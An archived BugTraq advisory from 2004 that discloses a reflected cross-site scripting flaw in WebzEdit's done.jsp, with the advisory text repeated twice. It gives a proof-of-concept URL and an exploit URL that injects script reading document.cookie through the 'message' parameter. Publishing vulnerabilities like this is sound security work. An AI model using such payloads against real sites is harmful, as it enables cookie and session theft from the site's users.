BugTraq
Back to list
|
Post reply
Cross Site Scripting in WebzEdit
Feb 21 2004 03:13PM
Cheng Peng Su (apple_soup msn com)
Title:Cross Site Scripting in WebzEdit
Release Date: Feb 22,2004
Application: WebzEdit
Version Affected: 1.9 or lower
Platform: JSP
Severity: Low
Discover: Cheng Peng Su(apple_soup[at]msn.com)
Vendor URL: http://www.freewebs.com/
################################################
Intro:
WebzEdit is a tool to edit web page online.
Proof Of Concept:
This page (http://host/WebzEdit/done.jsp?message=index.htm%20has%20been%20saved.) will show you a Message box with "index.htm has been saved." , and the [done.jsp] doesn't filter out illegal characters.
So here is a XSS vuln:
URL:http://host/WebzEdit/done.jsp?message=');[XSS code];a=escape('
Exploit:
URL:http://host/WebzEdit/done.jsp?message=');alert(document.cookie);a=es
cape('
----------------------------------------------------------
Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University,
Wuhan,Hubei,China
email:apple_soup[at]msn.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Title:Cross Site Scripting in WebzEdit
Release Date: Feb 22,2004
Application: WebzEdit
Version Affected: 1.9 or lower
Platform: JSP
Severity: Low
Discover: Cheng Peng Su(apple_soup[at]msn.com)
Vendor URL: http://www.freewebs.com/
################################################
Intro:
WebzEdit is a tool to edit web page online.
Proof Of Concept:
This page (http://host/WebzEdit/done.jsp?message=index.htm%20has%20been%20saved.) will show you a Message box with "index.htm has been saved." , and the [done.jsp] doesn't filter out illegal characters.
So here is a XSS vuln:
URL:http://host/WebzEdit/done.jsp?message=');[XSS code];a=escape('
Exploit:
URL:http://host/WebzEdit/done.jsp?message=');alert(document.cookie);a=es
cape('
----------------------------------------------------------
Cheng Peng Su
Class 1,Senior 2,High school attached to Wuhan University,
Wuhan,Hubei,China
email:apple_soup[at]msn.com
[ reply ]